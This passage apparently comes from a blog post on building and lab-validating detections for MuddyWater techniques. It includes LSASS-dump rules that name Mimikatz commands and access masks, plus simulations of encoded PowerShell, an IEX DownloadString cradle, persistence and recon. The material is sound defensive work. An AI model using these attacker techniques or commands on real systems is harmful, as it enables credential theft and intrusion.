lifecycle, each with a different detection philosophy.</p><p>Rule A is the design priority: a process accessing LSASS memory is the universal pre-condition for any LSASS dump, regardless of tool. Detecting the access event (Sysmon EID 10) rather than the tool name means Rule A fires on Mimikatz, procdump, custom C++ loaders, and any future variant — as long as the access mask is in the covered set. The access masks were sourced from established Mimikatz research (0x1010, 0x1410, 0x1438, 0x143a, 0x1418) and extended with 0x1fffff (PROCESS_ALL_ACCESS, used by custom dumpers) and 0x1f0fff (another all-access variant observed in the field). The exclusion list covers known legitimate callers — AV engines, CSrss, WinInit — without which this rule generates constant noise from endpoint security products.</p><p>Rule B is the name-based backstop. Lower fidelity because it misses renamed tools, but catches actors using stock Mimikatz. The analyst review pass re-bracketed the command_line clause to keep it inside the event_type guard — a real operator precedence bug that would have caused the command-line check to match events outside the process_create filter.</p><p>Rule C catches the dump artifact on disk — a final fallback when process-level events are unavailable. .dmp files in user-writable paths are anomalous outside of Windows Error Reporting, which writes to a fixed known path.</p><p><strong>Required telemetry:</strong> Sysmon Event ID 10 (ProcessAccess) with explicit lsass.exe targeting in the Sysmon configuration — this is not enabled by default. Without it, Rule A does not exist. Sysmon Event ID 1 for Rule B. Sysmon Event ID 11 for Rule C.</p><pre># Rule A — LSASS process access (tool-agnostic, highest confidence)<br>event_type = process_access AND<br>target_image ENDSWITH "lsass.exe" AND<br>granted_access MATCHES "(0x1010|0x1410|0x1438|0x143a|0x1418|0x1fffff|0x1f0fff)" AND<br>source_image NOT IN ["MsMpEng.exe","csrss.exe","wininit.exe","svchost.exe",<br>                     "SecurityHealthService.exe","CylanceSvc.exe","SentinelAgent.exe"]<br><br># Rule B - Known credential tool execution (name-based backstop)<br># command_line clause is bracketed inside event_type guard (bug fix in review)<br>event_type = process_create AND<br>(image IMATCHES "mimikatz\.exe" OR<br> image ENDSWITH "procdump64.exe" OR<br> image IMATCHES "lazagne\.exe" OR<br> command_line IMATCHES "(sekurlsa|lsadump|privilege::debug)")<br># Rule C - Dump file creation in user-writable path (artifact backstop)<br>event_type = file_create AND<br>file_extension = "dmp" AND<br>file_path MATCHES "(\\AppData\\|\\Temp\\|\\Users\\|\\ProgramData\\)"</pre><p><strong>Key false positives:</strong> AV and EDR agents that legitimately access LSASS — exclude by process hash, not name, since names are spoofable. Windows Error Reporting creating .dmp files in %TEMP%\WER — exclude that specific path in Rule C. Legitimate procdump usage by developers for application crash diagnostics — require a separate approved-tools baseline.</p><p><strong>Important environment note:</strong> Credential Guard and PPL (Protected Process Light) prevent LSASS reads on modern, hardened systems. If your environment has these enabled, LSASS dump detection is still valuable as a canary for misconfigured or unpatched endpoints, but confirm protection status before using coverage scores here as a measure of actual protection.</p><h3>Phase 5: Validation Lab</h3><h4>Architecture</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8U-N2gM0mGw6qRI7SG06dw.png"></figure><h4>Deploy in One Command</h4><pre>git clone https://github.com/anpa1200/operation-desert-hydra.git<br>cd operation-desert-hydra<br>cp stack/.env.template stack/.env   # fill in passwords<br>bash start.sh</pre><p>start.sh creates the Docker network, starts all stack services, waits for Elasticsearch, boots the Windows 10 Vagrant VM, provisions it via Ansible (Sysmon + Script Block Logging + Winlogbeat), and runs all 11 simulations.</p><h4>Simulation Design</h4><p>Every simulation is <strong>benign-by-design</strong>:</p><ul><li>No live malware, no real C2, no credential exfiltration</li><li>Simulations write benign files (VBScript with Write-Host payload), run real Windows binaries with harmless arguments, or use .NET to open process handles with minimal access masks</li><li>All .dmp files are deleted immediately after event confirmation</li><li>The VM does not connect to real Telegram infrastructure</li></ul><p>The Ansible playbook (lab/ansible/playbooks/validate.yml) runs each simulation, waits 3 seconds, queries the Windows Event Log with Get-WinEvent -FilterHashtable (time-bounded to the last 60 seconds), and prints PASS / FAIL.</p><h4>Step 21: det_mw_0001 — Spearphishing Delivery Chain</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8bLoGgU_easNlOr4ZndCgg.png"></figure><p><strong>What MuddyWater does:</strong> Delivers a ZIP or Office file via email or Egnyte/OneDrive link. The attachment contains a VBScript or WSF file that spawns a hidden encoded PowerShell loader (PowGoop/POWERSTATS).</p><p><strong>Simulation:</strong> wscript.exe sim_delivery.vbs → powershell.exe -WindowStyle Hidden -NonInteractive -EncodedCommand &lt;Base64&gt;</p><p><strong>KQL proof query:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.ParentImage: *wscript.exe*<br>AND winlog.event_data.Image: *powershell.exe*<br>AND winlog.event_data.CommandLine: *EncodedCommand*</pre><p><strong>Result: PASS</strong> — Sysmon EID 1 captured wscript.exe → powershell.exe -EncodedCommand. Parent-child chain and Base64 command line both visible in Kibana.</p><h4>Step 22: det_mw_0002 — Web Service Shell Spawn</h4><p><strong>What MuddyWater does:</strong> Exploits Exchange (CVE-2020–0688), IIS, or Log4j (CVE-2021–44228) — web-facing service spawns cmd.exe or powershell.exe for post-exploitation recon.</p><p><strong>Simulation:</strong> wscript.exe sim_exploit.vbs → cmd.exe /c whoami &amp; hostname &amp; ipconfig /all</p><p><strong>KQL proof query:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.ParentImage: *wscript.exe*<br>AND winlog.event_data.Image: *cmd.exe*<br>AND winlog.event_data.CommandLine: (*whoami* OR *hostname* OR *ipconfig*)</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*PdbeaS4qAhZO0Abz1vnxlw.png"></figure><p><strong>Result: PASS</strong> — Sysmon EID 1 captured wscript.exe → cmd.exe with recon commands in CommandLine.</p><h4>Step 23: det_mw_0003 — PowerShell Encoded Command</h4><p><strong>What MuddyWater does:</strong> PowGoop uses -EncodedCommand for C2 setup. POWERSTATS uses IEX + (New-Object Net.WebClient).DownloadString(...) for stager execution.</p><p><strong>Rule A simulation:</strong> powershell.exe -NonInteractive -e &lt;Base64(Write-Host "test")&gt;</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.CommandLine: *-e*<br>AND winlog.event_data.CommandLine: *[A-Za-z0-9+/]{40,}*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*t-a6QvN0QQMAwrYTgedLgw.png"></figure><p><strong>Rule A Result: PASS</strong> — 4 events captured. PowerShell with Base64 blob visible in command line.</p><p><strong>Rule B simulation:</strong> IEX ((New-Object Net.WebClient).DownloadString('http://127.0.0.1:19999/...'))</p><p><strong>KQL — Rule B:</strong></p><pre>winlog.event_id: 4104<br>AND winlog.event_data.ScriptBlockText: *IEX*<br>AND winlog.event_data.ScriptBlockText: *DownloadString*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-VDCsOq78LyTENKxOUQjJg.png"></figure><p><strong>Rule B Result: PASS</strong> — 16 EID 4104 events. Script Block Logging decoded the IEX + DownloadString pattern.</p><blockquote><strong><em>Capability gate:</em></strong><em> Script Block Logging (EID 4104) must be explicitly enabled. Without it, Rule B is unavailable and detection degrades to command-line heuristics only.</em></blockquote><h4>Step 24: det_mw_0004 — DLL Side-Loading</h4><p><strong>What MuddyWater does:</strong> PowGoop drops Goopdate.dll alongside a copy of GoogleUpdate.exe outside the legitimate Google installation path. When GoogleUpdate launches, Windows loads the malicious DLL.</p><p><strong>Simulation:</strong> Copy a benign 4-byte MZ stub as goopdate.dll into a test directory alongside a signed binary. Launch the binary.</p><p><strong>Result: PARTIAL</strong> — Sysmon EID 7 (ImageLoad) did not fire. Root cause: a 4-byte MZ stub is not a valid loadable DLL — the Windows loader rejects it before generating an EID 7 event. The Sysmon config and detection rule are correct. <strong>Resolution:</strong> Re-test with a real GoogleUpdate.exe (requires Google Chrome installed on lab VM).</p><h4>Step 25: det_mw_0005 — Registry Run Key Persistence</h4><p><strong>What MuddyWater does:</strong> Small Sieve writes OutlookMicrosift to HKCU\...\CurrentVersion\Run — a deliberate typo designed to look like a Microsoft entry. Canopy drops a .wsf file to the Startup folder.</p><p><strong>Rule A simulation:</strong> Write OutlookMicrosift = notepad.exe to HKCU\...\Run</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 13<br>AND winlog.event_data.TargetObject: *CurrentVersion\Run\OutlookMicrosift*</pre><p><strong>Rule A Result: PASS</strong> — 3 Sysmon EID 13 events. OutlookMicrosift Run key captured.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*RTAU8BoEU41ydMrali20PA.png"></figure><p><strong>Rule C simulation:</strong> Copy a benign .wsf file to %APPDATA%\...\Start Menu\Programs\Startup\</p><p><strong>KQL — Rule C:</strong></p><pre>winlog.event_id: 11<br>AND winlog.event_data.TargetFilename: *\Startup\*<br>AND winlog.event_data.TargetFilename: *.wsf*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*C6VaYiU1W6t9P7VM9Uyq6Q.png"></figure><p><strong>Rule C Result: PASS</strong> — 3 Sysmon EID 11 events. WSF file creation in Startup folder captured.</p><h4>Step 26: det_mw_0006 — Scheduled Task (43-Minute Beacon)</h4><p><strong>What MuddyWater does:</strong> BugSleep creates a scheduled task triggered every <strong>43 minutes</strong>. This interval is a BugSleep artifact — not a default, not a round number. It appears in INCD 2024 reporting and is one of the most precise technical IoCs in the dataset.</p><p><strong>Simulation:</strong> schtasks.exe /create /tn DH-SIM-0006-TestTask /tr notepad.exe /sc MINUTE /mo 43 /f</p><p><strong>KQL:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.Image: *\schtasks.exe*<br>AND winlog.event_data.CommandLine: */mo 43*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8a6plhGCKeJFpgCePxizDA.png"></figure><p><strong>Result: PASS</strong> — 3 Sysmon EID 1 events. schtasks.exe /mo 43 captured. The 43-minute interval in the command line is the exact BugSleep artifact.</p><blockquote><strong><em>Hunt value:</em></strong><em> </em><em>PT43M in Task Scheduler Operational logs is a retroactive hunt trigger. One match = investigate immediately. No legitimate software uses this exact interval.</em></blockquote><h4>Step 27: det_mw_0007 — RMM Tool Abuse</h4><p><strong>What MuddyWater does:</strong> Delivers a legitimate RMM binary (ScreenConnect, SimpleHelp, AteraAgent, Level, PDQConnect) via phishing email or file-sharing link. The binary is placed in AppData, Temp, or Downloads — not installed by an IT management system. This is documented in all five government source tiers.</p><p><strong>Simulation:</strong> Copy ScreenConnect.ClientService.exe to C:\Temp\dh-lab\ and launch it.</p><p><strong>KQL:</strong></p><pre>winlog.event_id: 1<br>AND winlog.event_data.Image: *\Temp\ScreenConnect*</pre><p><strong>Result: PASS</strong> — 6 Sysmon EID 1 events. RMM binary executing from \Temp\ captured.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*U9wgP3tZtCZYaEGIct6woQ.png"></figure><blockquote><strong><em>Production requirement:</em></strong><em> This detection requires a baseline of authorized RMM deployments per endpoint. Without the baseline, it generates noise. With it, any out-of-baseline RMM execution is an immediate high-confidence alert.</em></blockquote><h4>Step 28: det_mw_0008a — Telegram Bot API C2</h4><p><strong>What MuddyWater does:</strong> Small Sieve uses the Telegram Bot API (api.telegram.org:443) for C2 over HTTPS. In an enterprise environment where Telegram is not standard software, any non-browser process connecting to this domain is anomalous.</p><p><strong>Simulation:</strong> powershell.exe makes an HTTP request to https://api.telegram.org/botTEST/getMe (invalid token — 401 response; the connection attempt is the evidence).</p><p><strong>Result: FAIL</strong> — Sysmon EID 3 (NetworkConnect) did not fire. Root cause: VirtualBox NAT prevents Sysmon from capturing the outbound network connection to api.telegram.org in the lab environment. The Sysmon rule config is correct. <strong>Resolution:</strong> Re-test with a host-only NIC that provides direct internet access.</p><h4>Step 29: det_mw_0008b — DNS Tunneling</h4><p><strong>What MuddyWater does:</strong> Mori uses DNS tunneling for C2. High-volume queries with long, high-entropy subdomain labels are the telemetry signature.</p><p><strong>Simulation:</strong> 60 Resolve-DnsName queries with 42-character random labels against *.test.internal.</p><p><strong>KQL:</strong></p><pre>winlog.event_id: 22<br>AND winlog.event_data.QueryName: *.test.internal*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yt5HdYyG3lGJi-pY88VPXA.png"></figure><p><strong>Result: PASS</strong> — 180 Sysmon EID 22 events captured. 42-character random labels visible in QueryName field. Volume threshold (Rule A) and label-length threshold (Rule B) would both trigger in a production deployment.</p><h4>Step 30: det_mw_0009 — WMI SecurityCenter2 Discovery</h4><p><strong>What MuddyWater does:</strong> CISA AA22–055A documents a post-access survey script that queries root\SecurityCenter2\AntiVirusProduct via WMI — enumerating the installed AV product before deciding how to proceed. This is also combined with OS info, network config, and user queries in a single script.</p><p><strong>Simulation (Rule A):</strong> Get-WmiObject -Namespace root/SecurityCenter2 -Class AntiVirusProduct</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 4104<br>AND winlog.event_data.ScriptBlockText: *SecurityCenter2*</pre><p><strong>Rule A Result: PASS</strong> — 21 PS EID 4104 events. SecurityCenter2 visible in decoded ScriptBlockText.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wpLAuTyJkLgoqezMzJWISA.png"></figure><blockquote><strong><em>Detection value:</em></strong><em> SecurityCenter2 + AntiVirusProduct is one of the highest-specificity behavioral signals in this dataset. Its legitimate caller population is tiny: only AV management consoles and a few inventory tools query this namespace. A PowerShell process making this query outside those exceptions warrants immediate investigation.</em></blockquote><h4>Step 31: det_mw_0010 — LSASS Memory Access</h4><p><strong>What MuddyWater does:</strong> Uses Mimikatz, procdump64.exe, and LaZagne to dump LSASS memory and extract credentials. CISA AA22–055A names all three tools.</p><p><strong>Rule A simulation:</strong> .NET OpenProcess(PROCESS_QUERY_INFORMATION, lsass.pid) — opens a handle to lsass.exe with a minimal access mask, triggering Sysmon EID 10.</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 10<br>AND winlog.event_data.TargetImage: *lsass.exe*<br>AND winlog.event_data.GrantedAccess: 0x1400</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*G-oMtjgeEzuCIKfTDznKzA.png"></figure><p><strong>Rule A Result: PASS</strong> — 3,398 Sysmon EID 10 events with GrantedAccess: 0x1400 and TargetImage: lsass.exe. The high event count is expected — LSASS receives many legitimate handle requests from AV, EDR, and Windows system processes. Production deployment requires an allowlist of known-good callers.</p><p><strong>Rule C simulation:</strong> Write a 4-byte MDMP header as lsass_test.dmp to C:\Temp\dh-lab\ — triggers Sysmon EID 11.</p><p><strong>KQL — Rule C:</strong></p><pre>winlog.event_id: 11<br>AND winlog.event_data.TargetFilename: *.dmp*<br>AND winlog.event_data.TargetFilename: *Temp*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*TrCWgKcujqKdBRCX-OG26w.png"></figure><p><strong>Rule C Result: PASS</strong> — 6 Sysmon EID 11 events. C:\Temp\dh-lab\lsass_test.dmp creation captured.</p><blockquote><strong><em>Lab safety:</em></strong><em> The </em><em>.dmp file was deleted immediately after event confirmation. No credential material exists in the file — it was a 4-byte header stub. No real LSASS dump was performed.</em></blockquote><h3>Phase 5 Validation Results Summary</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Yl6Y0h2_ePVKH3i8einFDQ.png"></figure><p>Full run: ansible-playbook playbooks/validate.yml — <strong>ok=70 changed=42 failed=0</strong></p><ul><li>Step 21 — <strong>det_mw_0001</strong> · Process spawn → <strong>PASS</strong></li><li>Step 22 — <strong>det_mw_0002</strong> · Shell from service → <strong>PASS</strong></li><li>Step 23 — <strong>det_mw_0003</strong> · Rule A (-e + Base64) → <strong>PASS</strong></li><li>Step 23 — <strong>det_mw_0003</strong> · Rule B (IEX + DownloadString) → <strong>PASS</strong></li><li>Step 24 — <strong>det_mw_0004</strong> · EID 7 ImageLoad → <strong>PARTIAL</strong></li><li>Step 25 — <strong>det_mw_0005</strong> · Rule A (OutlookMicrosift) → <strong>PASS</strong></li><li>Step 25 — <strong>det_mw_0005</strong> · Rule C (WSF in Startup) → <strong>PASS</strong></li><li>Step 26 — <strong>det_mw_0006</strong> · schtasks /mo 43 → <strong>PASS</strong></li><li>Step 27 — <strong>det_mw_0007</strong> · Rule A (RMM from \Temp) → <strong>PASS</strong></li><li>Step 27 — <strong>det_mw_0007</strong> · Rule B (RMM from PS parent) → <strong>PASS</strong></li><li>Step 28 — <strong>det_mw_0008a</strong> · EID 3 Telegram → <strong>FAIL</strong></li><li>Step 29 — <strong>det_mw_0008b</strong> · EID 22 DNS tunneling → <strong>PASS</strong></li><li>Step 30 — <strong>det_mw_0009</strong> · Rule A (SecurityCenter2 EID 4104) → <strong>PASS</strong></li><li>Step 30 — <strong>det_mw_0009</strong> · Rule B (wmic SecurityCenter2) → <strong>PASS</strong></li><li>Step 31 — <strong>det_mw_0010</strong> · Rule A (LSASS EID 10) → <strong>PASS</strong></li><li>Step 31 — <strong>det_mw_0010</strong> · Rule C (.dmp EID 11) → <strong>PASS</strong></li></ul><p><strong>13 PASS / 1 PARTIAL / 1 FAIL</strong> across 16 rule checks.</p><h3>Phase 6: Coverage Matrix</h3><p>Of 22 ATT&amp;CK techniques documented in the source set:</p><ul><li><strong>15 techniques (68%)</strong> — score 5, fully lab-validated</li><li><strong>2 techniques (9%)</strong> — score 4, correlated and validated via fallback</li><li><strong>4 techniques (18%)</strong> — score 3, rule present but validation incomplete</li><li><strong>7 techniques</strong> — score 0, no detection (Lateral Movement, Collection, Exfiltration, Impact)</li></ul><p><strong>The six capability gates</strong> that determine your effective coverage floor:</p><ul><li><strong>PowerShell Script Block Logging (EID 4104)</strong> — unlocks det_mw_0003 Rule B and det_mw_0009 Rules A/C. Without it: detection degrades to command-line heuristics only.</li><li><strong>Sysmon EID 10 (ProcessAccess)</strong> — unlocks det_mw_0010 Rule A (tool-agnostic LSASS access). Without it: falls back to binary name matching, misses custom dumpers.</li><li><strong>Sysmon EID 7 (ImageLoad)</strong> — unlocks det_mw_0004 (DLL side-loading). Without it: DLL loads are completely invisible.</li><li><strong>DNS resolver logging (full QNAME)</strong> — unlocks det_mw_0008b (DNS tunneling). Without it: Mori C2 channel is invisible.</li><li><strong>Network flow / proxy logs</strong> — unlocks det_mw_0007 Rule C and det_mw_0008a. Without it: RMM and Telegram C2 network-layer coverage lost.</li><li><strong>Email gateway telemetry (SEG)</strong> — unlocks det_mw_0001 full correlated logic. Without it: email-to-endpoint correlation unavailable.</li></ul><h3>What Defenders Should Do Right Now</h3><p><strong>1. Baseline your RMM deployments.</strong> det_mw_0007 is the most consistently documented MuddyWater technique across all five source tiers. It fires on ScreenConnect, SimpleHelp, AteraAgent, Level, and PDQConnect from non-standard paths. But it needs a baseline of authorized deployments first. Build the baseline; the detection logic is already written.</p><p><strong>2. Enable PowerShell Script Block Logging fleet-wide.</strong> One Group Policy change:</p><pre>Computer Configuration → Administrative Templates → Windows Components<br>→ Windows PowerShell → Turn on PowerShell Script Block Logging → Enabled</pre><p>This unlocks det_mw_0003 Rule B and all three det_mw_0009 rules. No other change required.</p><p><strong>3. Configure Sysmon ProcessAccess against lsass.exe.</strong> Without it, LSASS credential dumping detection is binary-name-only. Renamed Mimikatz and custom C++ dumpers are invisible. Add &lt;ProcessAccess onmatch="include"&gt; targeting lsass.exe to sysmon.xml.</p><p><strong>4. Hunt for PT43M now.</strong> Query your Task Scheduler Operational logs for any task with a RepetitionInterval of PT43M. If you find one you didn't create, that is BugSleep. No other legitimate software uses this interval.</p><h3>Reproduce It Yourself</h3><p>The entire project is on GitHub: <a href="https://github.com/anpa1200/operation-desert-hydra"><strong>github.com/anpa1200/operation-desert-hydra</strong></a></p><p>One repository contains everything: Docker Compose stack (OpenCTI + Elasticsearch + Kibana), Vagrant lab VM, Ansible provisioning playbooks, detection rules in four formats (Sigma, KQL, Elastic JSON, SPL), structured intelligence datasets (YAML), and all 12 proof screenshots.</p><p><strong>Deploy:</strong></p><pre>git clone https://github.com/anpa1200/operation-desert-hydra.git<br>cd operation-desert-hydra<br>cp stack/.env.template stack/.env<br># fill in ELASTIC_PASSWORD, OPENCTI_ADMIN_PASSWORD, OPENCTI_ADMIN_TOKEN<br>bash start.sh<br># → OpenCTI: http://localhost:8080<br># → Kibana:  http://localhost:5601<br># → all 11 simulations run automatically (~10 min)</pre><p><strong>Stop / destroy:</strong></p><pre>bash stop.sh                # halt VM, keep stack and data<br>bash stop.sh --destroy-vm   # remove VM disk<br>bash stop.sh --destroy-stack  # also stop Docker stack</pre><p><strong>Skip the lab VM</strong> (OpenCTI + Kibana only, no Windows VM):</p><pre>bash start.sh --skip-lab</pre><p>Prerequisites: Docker, VirtualBox, Vagrant, Ansible, Python 3 + pywinrm. Full details in the <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/README.md">README</a>.</p><p>Key files:</p><ul><li>docs/article-step-0-project-scenario.md — full phase-by-phase walkthrough</li><li>data/detections.yaml — all 11 detection records with coverage scores</li><li>lab/ansible/playbooks/validate.yml — the 11 simulation playbook</li><li>detections/sigma/, detections/kql/, detections/elastic/, detections/spl/ — rule exports</li></ul><h3>What This Project Is Not</h3><p>This is not a red team toolkit. The lab produces benign telemetry for detection validation — no live malware, no real C2, no credential theft. The detection pseudologic is SIEM-agnostic and requires production translation and tuning before deployment. Coverage scores are conservative: 5 requires a Kibana screenshot, not just passing logic.</p><p>The source base is entirely public. The actor’s actual TTPs may be more sophisticated than what is documented. Treat the coverage matrix as a floor, not a ceiling.</p><h3>Production Scars</h3><p>Everything above describes what the project looks like after it worked. This section documents what broke, in what order, and what was actually fixed — the kind of detail that gets cut from writeups but is the most useful part for anyone trying to reproduce this.</p><h4>Scar 1: The Simulations Were Faking It</h4><p>The first validation attempt used synthetic event markers. The simulation playbook injected a DH-SIM-0001 string into the CommandLine field, then the Kibana queries looked for that exact string:</p><pre>winlog.event_id: 1 AND winlog.event_data.CommandLine: *DH-SIM-0001*</pre><p>This produces a screenshot. It does not prove a detection works.</p><p>The problem is fundamental: a query that looks for a marker you injected proves that injection works, not that a detection fires on real attacker behavior. If MuddyWater runs wscript.exe and spawns powershell.exe -EncodedCommand, the DH-SIM-0001 query returns nothing. The detection coverage number was meaningless.</p><p><strong>What was fixed:</strong> All simulations were rewritten to produce realistic execution chains — wscript.exe spawning powershell.exe -EncodedCommand &lt;base64&gt;, schtasks.exe /create /sc minute /mo 43, lsass.exe being accessed by a test process with the correct GrantedAccess mask. All KQL queries were rewritten to use real field-based conditions: winlog.event_data.ParentImage, winlog.event_data.GrantedAccess, winlog.event_data.TargetObject, winlog.event_data.ScriptBlockText. Every proof screenshot now shows a real field value, not a synthetic marker.</p><p><strong>The lesson:</strong> A proof screenshot is only as good as the conditions that trigger it. If the simulation writes what the query reads, you have a tautology, not a detection.</p><h4>Scar 2: det_mw_0004 — The DLL That Wouldn’t Load</h4><p>The simulation for det_mw_0004 (DLL side-loading) created a 4-byte MZ-header stub file named Goopdate.dll in a temp directory alongside GoogleUpdate.exe, then waited for Sysmon Event ID 7 (ImageLoad) to fire.</p><p>It never fired.</p><p>Root cause: a 4-byte MZ stub is not a valid PE binary. The Windows loader parses the PE header before loading — the stub fails the loader’s structural validation and is rejected before the load event is generated. Sysmon only generates EID 7 for DLLs that actually get mapped into process memory. A file that fails to load produces no EID 7.</p><p>The Sysmon configuration was correct. The detection rule was correct. The simulation was wrong.</p><p><strong>Result: PARTIAL</strong> — coverage score 3 instead of 5.</p><p><strong>What it would take to fix:</strong> The test needs a real, valid DLL — even an empty DLL compiled from a single DllMain that returns TRUE. Alternatively, installing the actual Google Chrome on the lab VM provides a real Goopdate.dll at the expected path, which could then be copied to a non-standard location. Neither was done in this iteration due to lab scope constraints (no internet access on the VM for Chrome installation, no compiler toolchain in the lab).</p><p><strong>The lesson:</strong> When validating EID 7 detections, your test artifact must be a valid loadable PE. A stub file saves time and produces nothing.</p><h4>Scar 3: det_mw_0008a — VirtualBox NAT Ate the Telegram Traffic</h4><p>The simulation for det_mw_0008a (Telegram Bot API C2) made an outbound HTTPS connection to api.telegram.org from PowerShell and waited for Sysmon Event ID 3 (NetworkConnect) to fire.</p><p>It never fired.</p><p>Root cause: VirtualBox NAT performs network address translation at the hypervisor level. Sysmon captures network connections at the Windows kernel level. With NAT, the connection from the VM’s perspective terminates at the NAT gateway (10.0.2.2), not at api.telegram.org. Sysmon sees a connection to 10.0.2.2:443, not api.telegram.org:443. The detection rule looking for api.telegram.org as the destination found nothing.</p><p>There was an additional layer: VirtualBox NAT does not forward arbitrary outbound HTTPS traffic by default in this lab configuration — the VM had no direct internet path, only access to the host’s 10.0.2.2 gateway. Even fixing the Sysmon observation problem would require a working internet path from the VM.</p><p><strong>Result: FAIL</strong> — coverage score 3 instead of 5.</p><p><strong>What it would take to fix:</strong> Add a host-only or bridged network adapter to the VM that provides direct internet access, and confirm Sysmon captures the connection with the external destination. Alternatively, run a local HTTPS server on the host at api.telegram.org via a hosts file override, which would make the destination resolvable within the lab and catchable by Sysmon.</p><p><strong>The lesson:</strong> VirtualBox NAT is the right choice for lab isolation (the VM cannot reach the internet accidentally), but it is the wrong choice if you need to validate detections based on external destination hostnames. Design the network topology before writing detection validation cases.</p><h4>Scar 4: Kibana Showed Nothing — Wrong Time Window</h4><p>After running the SecurityCenter2 WMI discovery simulation (Step 30), the Kibana query returned zero results.</p><p>The query was correct. The simulation had run correctly. The events were in Elasticsearch.</p><p>Root cause: Kibana’s default time window was set to “Last 15 minutes.” The simulation had run in a previous lab session, and Winlogbeat had shipped the events to Elasticsearch during that session. The events existed — they were just outside the current time window.</p><p><strong>What was fixed:</strong> Changed the time filter to “Last 24 hours.” Events appeared immediately.</p><p><strong>The lesson:</strong> When a Kibana proof shows no results, the first diagnostic step is the time filter, not the query. This is obvious in retrospect and a consistent source of false “detection failed” conclusions during initial validation runs.</p><h4>Scar 5: Detection Design Bugs Found in Review (Before Validation)</h4><p>Before running any simulations, every detection record went through a structured review pass. Four real bugs were found:</p><p><strong>det_mw_0010 Rule B — Operator precedence error.</strong> The original pseudologic was:</p><pre>event_type = process_create AND<br>image IMATCHES "mimikatz\.exe" OR<br>image ENDSWITH "procdump64.exe" OR<br>command_line IMATCHES "(sekurlsa|lsadump|privilege::debug)"</pre><p>Without explicit parentheses, OR has lower precedence than AND in most query languages. The command_line IMATCHES clause was evaluated independently of the event_type guard, meaning the rule would fire on any event (not just process_create) where the command line contained sekurlsa. In a SIEM with millions of events per day, this generates noise and potentially masks the real signal. The fix added explicit brackets to keep all OR branches inside the event_type = process_create guard.</p><p><strong>det_mw_0009 Rule C — T1033 was not covered.</strong> The initial Rule C matched SecurityCenter2, Win32_NetworkAdapterConfiguration, and Win32_OperatingSystem — covering T1518.001, T1016, and T1082. The documented CISA script also collects the username via Win32_ComputerSystem. T1033 (System Owner/User Discovery) was missing. Fixed by adding Win32_ComputerSystem|Win32_UserAccount|UserName to the pattern match.</p><p><strong>det_mw_0004 Rule A — Missing x86 Google path.</strong> The initial allowlist only contained the x64 path C:\Program Files\Google\. On 64-bit Windows, the 32-bit Google Update installs to C:\Program Files (x86)\Google\. Without the x86 path in the allowlist, any Goopdate.dll load from the legitimate 32-bit Google installation would fire the detection. Added both paths.</p><p><strong>det_mw_0010 Rule A — Access mask set too narrow.</strong> The initial mask set covered standard Mimikatz masks (0x1010, 0x1410, 0x1438) but missed 0x1fffff (PROCESS_ALL_ACCESS, used by custom C++ dumpers and some loaders) and 0x1f0fff (another all-access variant observed in field reporting). A detection that only catches stock Mimikatz masks is bypassed by any custom implementation. Extended the mask set to cover known custom-dumper variants.</p><p><strong>The lesson:</strong> Writing pseudologic in a YAML field with no syntax validation means operator precedence bugs survive until someone reads the logic carefully. Structured peer review — ideally by someone who will try to break the rule — catches these before they hit production.</p><h4>Scar 6: The OpenCTI Stack Was in a Different Repository</h4><p>The original project structure had the OpenCTI Docker Compose stack in a separate repository (opencti-intelligent-shield) that was not included in the desert-hydra repo. The start.sh script referenced the external repo with a hardcoded path. Cloning operation-desert-hydra and running start.sh failed immediately on any machine other than the development machine.</p><p><strong>What was fixed:</strong> The entire stack — docker-compose.yml, docker-compose.kibana.yml, and .env.template — was copied into stack/ inside the desert-hydra repo. All path references were updated. The repo is now fully self-contained: git clone + cp .env.template .env + bash start.sh works from a clean machine with no external dependencies beyond Docker, Vagrant, VirtualBox, Ansible, and pywinrm.</p><p><strong>The lesson:</strong> A reproducibility claim requires everything needed to reproduce to be in the same repository. External path dependencies are invisible during development and obvious on first external clone.</p><h4>Scar 7: MITRE Connector Timing</h4><p>The import script (tools/opencti_import.py) creates MuddyWater → uses → ATT&amp;CK technique relationships by looking up techniques that the MITRE ATT&amp;CK connector has synced into OpenCTI. The connector takes several minutes to complete its initial sync of 846 techniques.</p><p>If the import script runs before the connector finishes, the technique lookup returns nothing — the techniques don’t exist yet. The original script failed silently on these lookups and skipped the relationship creation.</p><p><strong>What was fixed:</strong> The script was updated with find_or_create_attack_pattern(): if a technique is not yet in OpenCTI, create a stub AttackPattern object with the correct x_mitre_id. When the MITRE connector eventually syncs that technique, OpenCTI's deduplication logic merges the stub with the connector's fully populated object. All relationships that were created against the stub are preserved and now point to the enriched object. Running the script a second time after the connector finishes confirms existing objects rather than creating duplicates.</p><p><strong>The lesson:</strong> Any script that creates relationships against objects populated by a connector needs to handle the case where the connector has not finished. Fail loudly or create stubs — don’t skip silently.</p><h4>Surviving Gaps</h4><p>Two failures from Phase 5 remain open:</p><p><strong>det_mw_0004</strong> — DLL side-loading detection (EID 7) is not lab-validated. The detection rule is sound; the simulation needs a valid PE DLL. Coverage score stays at 3 until the lab is extended with a compiled test DLL.</p><p><strong>det_mw_0008a</strong> — Telegram Bot API connection detection (EID 3) is not lab-validated. The detection rule is sound; the lab network topology prevents capturing external destination hostnames via NAT. Coverage score stays at 3 until the VM has a direct internet path 